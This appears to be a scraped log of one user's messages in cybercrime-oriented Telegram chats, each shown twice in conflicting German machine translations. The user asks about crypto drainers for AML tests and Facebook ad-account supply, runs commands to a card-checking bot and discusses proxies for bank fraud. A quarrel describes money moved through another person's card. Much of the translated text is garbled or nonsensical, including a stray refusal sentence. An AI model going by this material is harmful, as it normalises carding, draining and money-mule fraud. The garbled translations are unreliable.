Mach mal langsam2026-02-19 16:57
Ohne einen Bürgen würde ich auch keinen Prozentsatz der Ausgaben zahlen.Ich würde auch nicht auf Basis eines Prozentsatzes der Ausgaben ohne Bürgschaft finanzieren
B
Mach mal langsam2026-02-19 16:57
я?я?
B
Mach mal langsam2026-02-19 16:57
Na ja, sie hat Screenshots gepostet, und du hast mir nichts gegeben.Na ja, sie hat Screenshots gepostet, und du hast nichts dazu beigetragen
B
Mach mal langsam2026-02-19 16:56
Schau dir die Screenshots an, die sie gepostet hatSchau dir die Screenshots an, die sie gepostet hat
B
Mach mal langsam2026-02-19 16:55
Er hat nichts über einen Bürgen geschrieben?Hat er nichts über den Garanten geschrieben?
B
Mach mal langsam2026-02-19 16:54
Du bist ein Spinner😂Du bist ja ein Freak😂
B
Mach mal langsam2026-02-19 16:53
Du hast nach einem Bürgen gefragt.Du hast den Bürgen darum gebeten
B
Mach mal langsam2026-02-19 16:52
woan welchem Ort
B
Mach mal langsam2026-02-17 14:37
Wer besorgt einem Laden ein paar gute Autos?Wer verkauft mir einen Shop mit guten Autos?
B
Mach mal langsam2026-02-17 12:10
Wo auch immer du willst, die machen das für dich😂Egal wo, wenn es dir Spaß macht, machen sie es dir gerne😂
-- EMPIRE CHAT (24 Beiträge) --
B
Mach mal langsam2026-03-14 13:17
Ich habe schon herausgefunden, wie es geht, aber ich bin zu faul, es zu erklären.Ich habe es schon verstanden, aber ich bin zu faul, es zu erklären
B
Mach mal langsam2026-03-14 13:17
Er wird dich auf jeden Fall fertigmachen.Er wird dich auf jeden Fall über den Tisch ziehen
B
Mach mal langsam2026-03-12 17:16
Auf verschiedene Weise.Je nach Fall
B
Mach mal langsam2026-03-12 17:08
+ Außerdem toben gerade viele Stürme.+ Im Moment gibt es heftige Stürme
B
Mach mal langsam2026-03-12 17:07
Wenn es schwarz ist, wette ichWenn ich Schwarz hätte, würde ich wetten
B
Mach mal langsam2026-03-12 17:07
Das hängt davon ab, um was für ein Angebot es sich handelt – wenn es weiß ist, ja.Das hängt vom jeweiligen Angebot ab; wenn es ein weißes ist, dann ja
B
Mach mal langsam2026-03-12 17:06
Das sind zwei völlig verschiedene WeltenDas sind zwei verschiedene Welten
B
Mach mal langsam2026-03-12 17:06
Es gibt kein anderesEs gibt überhaupt keine andere
B
Mach mal langsam2026-03-12 17:06
Sie können es so einrichten, dass nur PCsDort kann man einstellen, dass nur PCs angezeigt werden
B
Mach mal langsam2026-03-12 17:05
Google ist nicht so effektiv, wie ich glaube.Google ist meiner Meinung nach nicht so effektiv
B
Mach mal langsam2026-03-12 17:05
Na ja, ich google nicht, ich nutze nur Facebook.Also, ich arbeite nicht mit Google, sondern nur mit Facebook
B
Mach mal langsam2026-03-12 17:05
Solange man während der ganzen Sache eine Ligatur finden muss.Vorausgesetzt, dass man all diese Dummköpfe noch irgendwie unter einen Hut bringen muss
B
Mach mal langsam2026-03-12 17:04
Ablehnungen, Akeys, die wie Stürme nur so herabregnen. Und so weiter.Rejects, Akkus fliegen einfach so weg, Stürme und so weiter
B
Mach mal langsam2026-03-12 17:04
Es ist nicht alles eitel Sonnenschein, Mann.Das ist noch lange nicht alles, Kumpel
B
Mach mal langsam2026-03-12 17:03
Alle regulären Luftakquisitionen mit höherer ZuverlässigkeitAlle gängigen Luftdruck-Akkus mit bester Leistung
B
Mach mal langsam2026-03-12 17:03
Derzeit gibt es keine guten Agenturen auf dem Markt.Derzeit gibt es keine guten Agenturen auf dem Markt
B
Mach mal langsam2026-03-12 17:02
Eher nervenaufreibend als beängstigendEher nervenaufreibend als beängstigend
B
Mach mal langsam2026-03-12 17:02
Krypto, Glücksspiel-Gespür und Schwarzsein – all das kommt zum VorscheinKrypto, Glücksspiel und düstere Themen – ich mag alles
B
Mach mal langsam2026-03-12 17:01
Das Letzte, was die Stadt getan hat, war, sich in 2d zu hacken.Das Letzte, was mir in 2D gefallen hat
B
Mach mal langsam2026-03-12 17:01
Wenn man nach mir sucht – sei es aus eigener Initiative oder aus Budgetgründen –, um herauszufinden, welche 2D-Kletterrouten 1–2.000 Zeles für Tests erfordern, die nicht lange halten werden.Wenn man nach etwas sucht, sei es aus eigener Tasche oder aus dem Budget, um herauszufinden, was in 2D funktioniert, muss man 1–2 Tausend Zloty für Tests ausgeben, und selbst dann hält es nicht lange durch.
B
Mach mal langsam2026-03-12 17:00
Ich schütte einIch gieße
B
Mach mal langsam2026-03-12 16:59
(da es für weiße Angebote keine derartigen Anforderungen gibt)Weil es für White-Label-Angebote keine solchen Anforderungen gibt)
B
Mach mal langsam2026-02-14 14:33
Wer hat einen „Dreiner“ unter AML-Prüfung? Nur mit DEP oder bereit auf dem BürgenHat jemand einen Drainer für den AML-Test? Nur mit Depot oder fertig auf Garant?
B
Mach mal langsam2026-01-11 03:14
Da ist jemand im FB-Beat, und da ist ein Kumpel. Brauche FB-Nachschub, der Preis ist verhandelbarEs gibt Leute, die auf Facebook gepostet haben, und es gibt Schimpfwörter. Ich muss mein Facebook-Guthaben aufladen – über den Preis können wir uns einigen.
-- STYX SNAT [ STYXMARKET.ST ] (2 Beiträge) --
B
Mach mal langsam2025-12-05 12:04
Rechnungen, Payzaty, Cashfree, Eportal 3DSRechnungen, Payzaty, Cashfree, Eportal 3DS
B
Mach mal langsam2025-11-22 11:14
Gibt es einen Chat-Garant?Gibt es hier einen Chat-Moderator?
-- Chat: Traffic-Schlichtung (2 Nachrichten) --
B
Mach mal langsam2025-11-24 14:50
100 %100 %
B
Mach mal langsam2025-11-24 14:49
Der Tg-Kanal wird gekapertDer Telegram-Kanal wird gehackt
-- Raven CC-Prüfung (2 Nachrichten) --
B
Mach mal langsam2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Mach mal langsam2025-11-21 21:18
/check/check
-- Vision Browser Chat (2 Nachrichten) --
B
Mach mal langsam2025-11-14 16:47
Danke.Danke
B
Mach mal langsam2025-11-14 16:47
vicen arbeitet in ru?Visible Work in Russisch?
-- 💬ONE|Chat (86 Nachrichten) --
B
Mach mal langsam2025-03-05 17:06
Leute, sagt mir doch mal, wo ich Bremsbeläge kaufen kann.Leute, sagt mal, wo kann man Spielplätze finden?
B
Mach mal langsam2025-03-05 16:22
Ich kann einfach nicht mal einen Manic gebenEr kann nicht einmal eine Maniküre machen
B
Mach mal langsam2025-03-05 16:22
ebensoebenso
B
Mach mal langsam2025-03-05 16:21
Sag mir verdammt noch mal, ob der Mentor einen Chatraum mit den Schülern hat oder nicht.Verdammt, kann mir mal jemand sagen, ob der Mentor einen Chat mit den Schülern hat oder nicht?
B
Mach mal langsam2025-03-05 16:10
und wem gehört das?Und wer ist das?
B
Mach mal langsam2025-03-05 15:44
Es ist nicht schwer, aber es gibt hier keine vollständigen Anleitungen, sondern nur Tutorials.Es ist nicht schwer, aber es gibt hier keine vollständigen Anleitungen, nur die von den Mentoren
B
Mach mal langsam2025-03-05 15:42
Im Grunde genommen ja, wenn man weiß, wie es geht.Im Grunde genommen ja, wenn man es kann
B
Mach mal langsam2025-03-05 15:42
einen halben Tageinen halben Tag
B
Mach mal langsam2025-03-05 15:42
Der erste hat 600 Leute, er antwortet nicht.Bei den ersten 600 Personen gibt er keine Antwort
B
Mach mal langsam2025-03-05 15:41
Wenn du das Geld hast, nimm das Modell, das 200 Dollar kostet.Wenn du Geld hast, nimm die, die 200 Dollar verlangt
B
Mach mal langsam2025-03-05 13:55
Wer unterrichtet dort besonders gut? Gibt es einen Chatraum für Schüler?Gibt es bei „Fantastika“ einen Chat für die Schüler?
B
Mach mal langsam2025-03-03 15:10
SchecksQuittungen
B
Mach mal langsam2025-03-03 15:10
Der, der staubsaugtdie staubsaugt
B
Mach mal langsam2025-03-03 15:10
VerstandenEs gibt
B
Mach mal langsam2025-03-03 15:10
Es gibt wahrscheinlich auch Huren mit Software.Da gibt’s auf jeden Fall ein paar Schlampen mit Software
B
Mach mal langsam2025-03-03 15:09
Es warEs war
B
Mach mal langsam2025-03-03 15:09
Oh, das ist gut.Das ist ja mal was
B
Mach mal langsam2025-03-03 15:09
Der dreistöckige TurmTrinuriuet Ruru
B
Mach mal langsam2025-03-03 15:09
Und sie werden gesammeltUnd die werden gesammelt
B
Mach mal langsam2025-03-03 15:09
Tip sitzt einfach nur da und zerknüllt VerpackungenDer Typ sitzt da und jagt Bonbonpapier herum
B
Mach mal langsam2025-03-03 15:04
Warum gibt es ukrainische Nummernschilder?Warum auf Ukrainisch?
B
Mach mal langsam2025-03-03 15:03
Ich sagte „kc“.Ich sagte: „Kz“
B
Mach mal langsam2025-03-03 15:03
Ich hab's verstanden.Ich habe es verstanden
B
Mach mal langsam2025-03-03 15:03
Wenn es kompliziert ist, verlierst du deinen Melone.Wenn du hier zu wild drauf loslegst, geht dir der Kessel kaputt
B
Mach mal langsam2025-03-03 15:03
Scheiße, lass uns mal vergleichen, wie oft du den Facebook-Rekul durchläufst, während ich die Mehlschwitze vom Herd nehme.Komm schon, lass mal sehen, wie oft du den FB-Recul startest, während ich die Kamera abnehme
B
Mach mal langsam2025-03-03 15:02
Für eine BegleitpersonZum Begleitservice
B
Mach mal langsam2025-03-03 15:02
Die Typen haben die Chitty-Chitty-Entwicklung, um einen verdammten Wichser zu starten.Bei den Typen von Cheats geht es darum, sich einen runterzuholen
B
Mach mal langsam2025-03-03 15:02
Scheiße, hier sind nur Woker.Verdammt, hier sind nur Workaholics am Werk
B
Mach mal langsam2025-03-03 15:02
Welche Art von TischenWelche Tische
B
Mach mal langsam2025-03-03 15:01
30 gehören dir, wenn du eine schöne Stimme hast.30 werden dir gehören, wenn deine Stimme schön ist
B
Mach mal langsam2025-03-03 15:01
Es gibt mehr GeldDort gibt es mehr Geld
B
Mach mal langsam2025-03-03 15:01
Komm doch zu mir ins Büro.Komm doch zu mir ins Kulturzentrum, um dort zu arbeiten
B
Mach mal langsam2025-03-03 15:00
NoNein
B
Mach mal langsam2025-03-03 14:59
PlategamPlategam
B
Mach mal langsam2025-03-03 14:59
+ Ich weiß nicht, wie man eine Wiederholung abspielt+ Ich habe keine Ahnung von den Regeln
B
Mach mal langsam2025-03-03 14:59
Gute Drops sind schwer zu finden.Gute Drops sind schwer zu finden
B
Mach mal langsam2025-03-03 14:58
Oder gibt es eine Version 1.0?Oder 1.0 ist vorhanden
B
Mach mal langsam2025-03-03 14:58
Hier gibt es nur 2,0 Phish.Und hier sind die Fische bei 2,0 Ampere
B
Mach mal langsam2025-03-03 14:58
Oder lieber 1.0 als 2.0.Na ja, besser 1.0 als 2.0
B
Mach mal langsam2025-03-03 14:57
Mit MammutsMit Mammuts
B
Mach mal langsam2025-03-03 14:57
2.0 funktioniert nicht, wenn man nur rumhängt und rumalbert.2.0 – Es bringt nichts, rumzusitzen und zu quatschen
B
Mach mal langsam2025-03-03 14:57
Ich bin eher der Typ für den Straßenverkehr.Ich habe mehr Traffic
B
Mach mal langsam2025-03-03 14:57
Hier sind die X von RooHier sind die X-Zeichen auf der Hand
B
Mach mal langsam2025-03-03 14:56
Aber das sind keine WerbeslogansAber das sind keine Werbeteams
B
Mach mal langsam2025-03-03 14:56
Das tun sie. Ich kenne jemanden, der das tut.(Das machen sie) – ich habe Bekannte, die das tun
B
Mach mal langsam2025-03-03 14:56
Das ist kein Problem, wenn man weiß, wie man täglich 400 bis 500 verdient.Ach was, wenn man es draufhat, verdienen manche Typen 400 bis 500 pro Tag
B
Mach mal langsam2025-03-03 14:55
Na und, was ist schon dabei?)Na ja, was habe ich hier denn vergessen?
B
Mach mal langsam2025-03-03 14:55
Es gibt einen Link zum HandbuchDort ist ein Link zum Handbuch
B
Mach mal langsam2025-03-03 14:54
Das sind genau die HändeSo etwas wird man sich zulegen
B
Mach mal langsam2025-03-03 14:54
Verdammt noch mal sabbern und gaffen, nur um eine verdammte Hand zu kriegen.Um eine Frau zu verführen, kann man sabbern und die Augen weit aufreißen
B
Mach mal langsam2025-03-03 14:54
Na, wo liegt denn das Problem? Es ist doch dasselbe.Na ja, wo liegt denn hier das Problem? Das ist doch dasselbe.
B
Mach mal langsam2025-03-03 14:53
Es wird einen Monat dauern, bis wir dort sindIn einem Monat wird man in die Zone gelangen
B
Mach mal langsam2025-03-03 14:53
Und es gibt keinen Ausweg. Wenn du Verstand hast, wirst du es schon herausfinden. Wenn nicht, fliegst du hier raus.Ach, da gibt’s doch nichts zu tun – wenn man den Verstand hat, kommt man schon klar, und wenn nicht, na ja, was soll man da schon machen
B
Mach mal langsam2025-03-03 14:53
Was willst du?Was wolltest du denn?
B
Mach mal langsam2025-03-03 14:53
AnzeigeWerbung
B
Mach mal langsam2025-03-03 14:52
Ich bin jetzt seit zwei Tagen hier und 2.0 ist nicht interessant. Ich fand es cool.Ich bin jetzt seit zwei Tagen hier und 2.0 interessiert mich nicht – ich dachte, das wäre irgendwie cool
B
Mach mal langsam2025-03-03 14:52
Und genießt ein MammutUnd einen Mammut zu züchten
B
Mach mal langsam2025-03-03 14:52
Überlege dir gut, was du sagen willst.Ich muss kurz überlegen, was ich antworten soll
B
Mach mal langsam2025-03-03 14:52
Es gibt keine GeheimnisseDa gibt es keine Geheimnisse
B
Mach mal langsam2025-03-03 14:52
Was wird er dir geben?Was bringt es Ihnen?
B
Mach mal langsam2025-03-03 14:52
Na ja, was bringt das, wenn das Handbuch genau dieselben Informationen enthält?Aber was bringt das, wenn all diese Infos im Handbuch stehen?
B
Mach mal langsam2025-03-03 14:51
Er wird Zeit haben, auf all eure Fragen zu antwortenWir schaffen es doch nie, euch allen zu antworten
B
Mach mal langsam2025-03-03 14:51
Was für ein Training.Welche Praxis
B
Mach mal langsam2025-03-03 14:51
Da sind 100 Leute drin.Mensch, da sind bei ihm jeweils 100 Leute
B
Mach mal langsam2025-03-03 14:51
Gib mir doch etwas Geld, dann gebe ich dir die Anleitung für die Klemme.Kannst du mir ein bisschen Geld schicken? Dann schicke ich dir die Anleitung per Download.
B
Mach mal langsam2025-03-03 14:50
Bei der BefestigungIn der Befestigung
B
Mach mal langsam2025-03-03 14:50
Du brauchst kein Handbuch, um das alles zu lernen.Ach, ihr braucht doch gar keine Einweisung, das Handbuch ist doch da
B
Mach mal langsam2025-03-03 14:50
2.0 ist, wie es ist.2.0 So war es und so ist es
B
Mach mal langsam2025-03-03 14:50
Was zum Teufel ist das Problem?Was für eine verdammte Aufgabe ist das denn?
B
Mach mal langsam2025-03-03 14:48
Hast du es selbst angefangen?Hast du schon selbst angefangen?
B
Mach mal langsam2025-03-03 14:48
Kein „Kuckuck“Das funktioniert überhaupt nicht
B
Mach mal langsam2025-03-03 14:48
Es gibt einen Treffer auf lkLaut LK gibt es Morde
B
Mach mal langsam2025-03-03 14:48
Was ist denn da los?Wie gehst du bei der Arbeit an dem Schloss vor?
B
Mach mal langsam2025-03-03 14:48
Welcher von euch ist denn nun der „Arsch“, wie ihr es selbst nennt?Woher hast du diese Scheißtypen, wie du gesagt hast?
B
Mach mal langsam2025-03-03 14:47
Ich verstehe nicht, was du damit meinst.Da habe ich nicht ganz verstanden, was du gesagt hast
B
Mach mal langsam2025-03-03 14:46
Wenn sie angemeldet sind, umso besser.Wenn sie ins LK kommen, dann ZBS
B
Mach mal langsam2025-03-03 14:46
Na, melden sie sich an?Geht ihr denn in den Chat?
B
Mach mal langsam2025-03-03 14:45
Ich weiß nicht, wie sie sie schießen.Keine Ahnung, ich weiß nicht, wie man die abnimmt
B
Mach mal langsam2025-03-03 14:45
Hunde, die man abschreiben muss?Rauchst du eine Zigarette?
B
Mach mal langsam2025-03-03 14:45
Verdammt, da ist ein verdammter DruckknopfWas soll der Scheiß denn noch?
B
Mach mal langsam2025-03-03 14:42
Ich schütte es mir selbst einIch gieße selbst
B
Mach mal langsam2025-03-03 14:42
Mir ist verdammt noch mal klar geworden, dass das nichts für Weicheier ist.Ich hab's verdammt noch mal kapiert, das ist kein Scheiß
B
Mach mal langsam2025-03-03 14:41
Alter, hier gibt’s nichts auf Kredit, das ist ein „Payday-Chip“.Alter, hier wird nichts auf Chip verkauft, hier muss man mit Bargeld bezahlen
B
Mach mal langsam2025-03-03 14:41
Ich verstehe schon, man kann es nirgendwo hinschüttenMir ist klar geworden, dass man es hier nirgendwo hin schütten kann
B
Mach mal langsam2025-03-03 14:40
Ich glaube, Regular 2.0.So etwas wie die üblichen 2.0
B
Mach mal langsam2025-03-03 14:40
Es ist ja nicht so, als würden sie den Datenverkehr überflutenHier wird also kein Traffic generiert
-- Fbstore – Chat für erfolgreiche Webmaster! (23 Beiträge) --
B
Mach mal langsam2025-02-26 07:51
Na ja, mach doch, was auch immer dir gerade in den Sinn kommt.Na toll, da ist ja ein Gesicht, das niemandem gehört
B
Mach mal langsam2025-02-26 07:50
Ein Schüler 200 Rubel.Na ja, 200 Rubel für die Schulmütze
B
Mach mal langsam2025-02-26 07:50
Das wird klappenDas reicht
B
Mach mal langsam2025-02-26 07:50
Du wirst einen Obdachlosen auf der Straße sehen.Es tut mir leid, aber dabei kann ich dir nicht helfen.
B
Mach mal langsam2025-02-26 07:50
Jeder glaubt also an sein eigenes Gesicht, egal wessen es ist.Also verifizieren sich dort alle mit ihrem eigenen Gesicht – wen interessiert’s?
B
Mach mal langsam2025-02-26 07:50
Auf die Nase.Auf eigene Rechnung
B
Mach mal langsam2025-02-26 07:49
Aber Tatsache ist, egal wie, ich habe es schon zehn Mal gemacht.Aber eigentlich ist es mir egal, ich habe so etwa 10 verifizierte Accounts
B
Mach mal langsam2025-02-26 07:49
Also sag mal, du redest doch nur Unsinn.Also, sag mal, was redest du da für einen Unsinn?
B
Mach mal langsam2025-02-26 07:49
Du kannstDas ist möglich
B
Mach mal langsam2025-02-26 07:49
Auf die Nase.Auf eigene Rechnung
B
Mach mal langsam2025-02-16 20:26
anstatt sie mit irgendeinem Training zu ruinieren und sie im Verkehr zu schikanieren.und nicht etwa, sie mit irgendwelchen Kursen zu verarschen und damit Traffic zu generieren
B
Mach mal langsam2025-02-16 20:25
Normales Gesetz, UBT, TT, TT, YouTube usw.die üblichen Kanäle wie UBT, TT, YouTube usw.
B
Mach mal langsam2025-02-15 17:31
XzХз
B
Mach mal langsam2025-02-15 17:31
Unter dem Vorwand einer SchulungUnter dem Vorwand der Ausbildung
B
Mach mal langsam2025-02-15 17:31
Zu den KanälenAuf die Kanäle
B
Mach mal langsam2025-02-15 17:31
Das liegt einfach am Menschenandrang.Es ist einfach der Traffic von den Leuten, der einen einholt
B
Mach mal langsam2025-02-15 17:31
Der Typ sagt also, man solle alle seine Kanäle abonnierenDer Typ sagt also, man solle alle seine Kanäle abonnieren
B
Mach mal langsam2025-02-15 16:36
Du musst nicht schreibenHui Nyu schlägt vor, dass ihr das nicht schreiben müsst
B
Mach mal langsam2025-02-06 15:11
Wenn du die Grundlagen des Einschenkens nicht beherrschst, wirst duWenn du solche Grundlagen nicht kennst, wie willst du dann gießen?
B
Mach mal langsam2025-02-06 15:11
Es gibt eine Schaltfläche, um das AIPI zu ändern; du solltest zumindest mal danach googeln.Wenn du auf den Button klickst, ändert sich die IP-Adresse – googel es ruhig mal
B
Mach mal langsam2025-02-06 15:10
🤨🤨
B
Mach mal langsam2025-02-06 15:09
Du kannst das Aipi dort durch Drehen verändern.Dort kann man die Rotation ändern
B
Mach mal langsam2025-02-06 15:09
Warum 1, es ist doch dasselbe HandyWarum 1, das ist doch Mobilgeräte
-- CryptoGrab – Chat zur gegenseitigen Hilfe (10 Nachrichten) --
B
Mach mal langsam2025-02-06 15:31
So einfach ist das nichtSo einfach ist das nicht
B
Mach mal langsam2025-02-06 15:31
Ganz einfach.Spur
B
Mach mal langsam2025-01-23 20:30
Kein einziges BeispielEs gibt nicht nur ein Beispiel
B
Mach mal langsam2025-01-23 20:30
Es ist nicht gerade lustig, dass ich im Internet keine Anzeigen für AML-Tests finden konnte.Ist das nicht komisch, dass ich im Internet überhaupt keine Werbung für AML-Tests gefunden habe?
B
Mach mal langsam2025-01-23 17:20
Auf dem AML ist überhaupt nichts zu sehen.Auf AML gibt es überhaupt nichts
B
Mach mal langsam2025-01-23 17:20
Ich habe es auf Facebook versucht, um Amerika loszuwerden – auch vernünftige, sogar alte Pakete, die im Internet nicht zu finden sindIch habe versucht, auf Facebook etwas über Amerika zu posten, habe aber im Internet keine vernünftigen, nicht einmal älteren Links dazu gefunden.
B
Mach mal langsam2025-01-23 17:19
Also, was für ein Angebot hast du denn vor?Und wie sieht dein Angebot denn eigentlich aus?
B
Mach mal langsam2025-01-23 17:16
Verwenden Sie AML?Und, trinkst du Aml?
B
Mach mal langsam2025-01-21 20:38
Jeder, der auf Facebook postet, möchte gerne ein paar Fragen klärenGibt es hier jemanden, der auf Facebook postet? Ich hätte da ein paar Fragen
B
Mach mal langsam2025-01-20 11:08
Hat jemand Beispiele für Creos für AML?Hat jemand Beispiele für KREO für AML?
-- Rolex | Allgemeiner Chat (28 Nachrichten) --
B
Mach mal langsam2024-09-11 15:29
Was machen die Litauer auf welchem Platz?Und auf welcher Plattform wird Litauen fertiggemacht?
B
Mach mal langsam2024-09-11 15:21
Willst du an der Schraube rumfummeln?Willst du mich verarschen?
B
Mach mal langsam2024-09-11 15:20
Es ist nur so, dass die Seiten sehr restriktiv sind und man so viel damit herumfummeln mussEs ist einfach so, dass die Plattformen die Arbeit stark einschränken und es so viel Ärger mit ihnen gibt
B
Mach mal langsam2024-09-11 15:19
Ich habe da eine Idee. Wenn sie das umsetzen, wird es verdammt geil.Mir ist da ein Thema eingefallen, das ich geschrieben habe – wenn sie es umsetzen, wird es der Hammer
B
Mach mal langsam2024-09-11 15:19
Auf der Finca sehe ich nicht viele Baumstämme.Ich sehe nicht wirklich Logos auf der Finke
B
Mach mal langsam2024-09-11 15:19
Bei den Veranstaltungsorten läuft da irgendwas total Abgefahrenes ab.Ach komm, die Typen haben da irgendeinen Schwachsinn mit all den Plattformen
B
Mach mal langsam2024-09-11 15:16
Genau das meine ich, es ist wie eine Furt auf einer Furt.Na ja, ich sag ja immer: Betrug auf Betrug
B
Mach mal langsam2024-09-11 15:15
Ich verstehe nicht, was jetzt besser laufen soll – ich sehe ja, dass in Finnland niemand arbeitet.Ich kann echt nicht verstehen, was gerade besser läuft; ich sehe, dass bei allen irgendwas mit der Finka nicht klappt
B
Mach mal langsam2024-09-11 15:08
Nun, die Chancen stehen fifty-fifty, ob man mit den Proxys Glück hat.Na ja, 50:50 – wenn man Glück mit dem Proxy hat
B
Mach mal langsam2024-09-11 15:07
Aber nur damit du es verstehst: Heutzutage, mit diesen Luxus-Proxys, spielt das System sogar bei Viber verrückt, sobald man sich einloggt.Aber damit du es verstehst: Selbst bei Viber gibt es jetzt diese lästigen Proxys, die einen stören, wenn man sich einloggt
B
Mach mal langsam2024-09-11 15:07
Na ja, bei den EU-Dosen bin ich mir nicht sicher.Also, von den EU-Banken hab ich keine Ahnung
B
Mach mal langsam2024-09-11 15:07
Und lkIn den LK
B
Mach mal langsam2024-09-11 15:06
Früher hatten die Feinkostläden 10 KühlräumeFrüher hielten die Laksheri nach jeweils 10 Durchgängen
B
Mach mal langsam2024-09-11 15:06
Nun, die 922 ist ebenfalls im Rennen und hält sich gut.Na ja, 922 kommt auch rein, sie halten durch
B
Mach mal langsam2024-09-11 15:05
Selbst privat macht ihnen das schon nach drei Besuchen Angst.Selbst im Privatbereich betrügt er sie nach dem dritten Versuch
B
Mach mal langsam2024-09-11 15:05
Wenn 1 Bevollmächtigter für 1–2 BankenWenn 1 Proxy 1–2 Stromkreise
B
Mach mal langsam2024-09-11 15:05
Nun, das hängt davon ab, um welche Bank es sich handeltDas hängt davon ab, um welche Bank es sich handelt
B
Mach mal langsam2024-09-11 15:04
Die Stellvertreter sind oft schmutzig in diesem Laksheri-QuatschIn Lakshari Huinya sind die Proxys oft verschmutzt
B
Mach mal langsam2024-09-11 08:44
Schläft es?Schläft er?
B
Mach mal langsam2024-09-11 08:40
Oh, das ist eine tolle Idee.Das hat sich ZBS ausgedacht
B
Mach mal langsam2024-09-11 08:40
Gibt es dort nicht so etwas wie einen Flohmarkt oder so?Warum gibt es bei denen denn keine Flohmärkte hier und da?
B
Mach mal langsam2024-09-11 08:40
Total danebenScheiße
B
Mach mal langsam2024-09-11 08:39
BallBily
B
Mach mal langsam2024-09-11 08:39
Gibt es Chatrooms?Gibt es dort Chats?
B
Mach mal langsam2024-09-11 08:38
Weiß jemand,Weiß das jemand?
B
Mach mal langsam2024-09-11 08:38
Nutzen die Leute in Finca TG?Nutzen die Leute in der Finka TG?
B
Mach mal langsam2024-09-10 12:14
Danke.Danke
B
Mach mal langsam2024-09-10 12:13
Wie spät ist es in Finnland?Wie spät ist es gerade in Finnland?
-- Aktuelles/Verifizierungen/Verdienstmöglichkeiten💃🛍 (37 Beiträge) --
B
Mach mal langsam2024-06-16 17:17
Ich sehe keine leidenschaftlichen Verteidiger von ihrIch sehe hier keine leidenschaftlichen Verfechter von ihr
B
Mach mal langsam2024-06-16 17:17
Nun, die Situation wurde ja dargelegt, und dann trifft jeder seine eigene Entscheidung, und die Tatsache, dass nur Admin Pasha sie verteidigt, spricht Bände.Na gut, ich habe die Situation geschildert, und nun muss jeder selbst entscheiden. Dass sie nur von Admin Pascha verteidigt wird, spricht Bände.
B
Mach mal langsam2024-06-16 17:15
Und sie hat wieder nicht gezahltUnd sie hat wieder nicht bezahlt
B
Mach mal langsam2024-06-16 17:15
Nein, sie hat es an uns überwiesen, und da wir dann nicht über das nötige Guthaben verfügten, um das Geld weiterzuleiten, haben wir Vika als letzten Ausweg angeschrieben.Nein, sie hat es auf uns abgewälzt, aber wir hatten hier keine Möglichkeit, das Geld zu überweisen, und so haben wir als letzte Möglichkeit an Vika geschrieben
B
Mach mal langsam2024-06-16 17:14
Anfangs ging es uns auch gut, aber in letzter Zeit verschwindet dein Geld ständig.Anfangs lief bei uns auch alles normal, aber in letzter Zeit geht bei euch ständig Geld verloren
B
Mach mal langsam2024-06-16 17:14
Mache ich hier Spam? Ich sitze hier und sage den Leuten die Wahrheit. Du kannst das ruhig ignorieren. Lass die Leute wissen, wie du arbeitest.Und ich bekomme Spam? Ich sitze hier und erzähle den Leuten die Wahrheit – kannst du das löschen? Was ändert sich dadurch? Die Leute sollen wissen, wie ihr arbeitet.
B
Mach mal langsam2024-06-16 17:13
Wenn du eines davon hastWenn Ihnen so etwas passiert
B
Mach mal langsam2024-06-16 17:13
Es ist also an der Zeit, dass du darüber nachdenkstEs ist also an der Zeit, dass Sie darüber nachdenken
B
Mach mal langsam2024-06-16 17:13
Wir arbeiten ebenfalls schon seit langer Zeit mit nei zusammen, und dies ist nun schon das zweite MalWir arbeiten auch schon lange mit ihr zusammen, und das ist bereits der zweite Fall
B
Mach mal langsam2024-06-16 17:13
Und sie hat die GS aufgenommen und gesagt: „Du weißt ja, wie das läuft.“Und sie hat sich das notiert und gesagt, dass Sie wissen, wie das funktioniert
B
Mach mal langsam2024-06-16 17:13
Genau so ist es gelaufen: Fangen wir von vorne an. Wir haben ihre Karte genommen, um Geld abzuheben, haben 60.000 eingezahlt, sie wollte es abheben und schreibt nun, dass das Geld nicht da sein wird, weil der Geldautomat die Karte verschluckt hat – und das war’s. Wir haben einfach 60.000 weggeworfen.Genau das ist passiert: Also, fangen wir von vorne an. Wir haben ihre Karte genommen, 60.000 darauf geladen, sie ist losgegangen, um das Geld abzuheben, und schreibt dann, dass sie kein Geld bekommt, weil der Geldautomat angeblich ihre Karte eingezogen hat. Und so haben wir einfach 60.000 verloren.
B
Mach mal langsam2024-06-16 17:11
Sie ist nicht diejenige, die uns in der Hand hatUnd nicht wir bei ihr
B
Mach mal langsam2024-06-16 17:11
Obwohl uns tatsächlich 60.000 gestohlen wurdenObwohl uns 60.000 gestohlen wurden
B
Mach mal langsam2024-06-16 17:11
Normal? Wir haben hier alles erklärt. Du sagst damit, wir seien Idioten.Normal? Wir haben hier alles erklärt, und du sagst, wir seien Idioten
B
Mach mal langsam2024-06-16 17:10
Du nimmst sie in SchutzDu beschützt sie
B
Mach mal langsam2024-06-16 17:10
Sie hat unser Geld immer nochUnser Geld ist bei ihr geblieben
B
Mach mal langsam2024-06-16 17:10
alleAlle
B
Mach mal langsam2024-06-16 17:10
Dass einem Mann 60 Riesen gezahlt wurden, sagte sie, es sei kein Geld da.Als man ihm 60.000 gezahlt hat, sagte er, er würde das Geld nicht bekommen
B
Mach mal langsam2024-06-16 17:10
Beschrieben*Beschrieben*
B
Mach mal langsam2024-06-16 17:10
Die gesamte Situation wurde Ihnen bereits geschildertDie ganze Situation wurde dir beschrieben
B
Mach mal langsam2024-06-16 17:09
Wer ist der Verräter? Sie oder wir.Wer ist hier der Trottel, sie oder wir?
B
Mach mal langsam2024-06-16 17:09
Wir haben 60.000 auf dem Konto. Wo ist das Geld?60.000 wurden überwiesen – wo ist das Geld?
B
Mach mal langsam2024-06-16 17:09
Die Situation wurde dir ausführlich erklärt, ganz gleich, welches Geschlecht du hast.Welche Frauen haben dir die Situation erklärt? Das Geschlecht spielt dabei überhaupt keine Rolle.
B
Mach mal langsam2024-06-16 17:08
Hol dir 60 Riesen und mach Feierabend.60.000 verdienen und dann aufhören
B
Mach mal langsam2024-06-16 17:08
Oder ich ficke dich, im Rahmen des Zumutbaren.Oder was zum Teufel ist bei euch im Rahmen des Zumutbaren?
B
Mach mal langsam2024-06-16 17:08
Die Leute haben kein Geld dafürWoher sollen die Leute das Geld nehmen?
B
Mach mal langsam2024-06-16 17:08
Und er sagt, die Karte sei kaputtgegangen und er habe kein Geld mehr.Und er sagt, die Karte sei blockiert, er habe kein Geld
B
Mach mal langsam2024-06-16 17:08
Einem Mann wurden 60 Riesen gezahlt, sie ging zum Dreh.Jemand hat ihr 60.000 gezahlt, also hat sie angefangen zu filmen
B
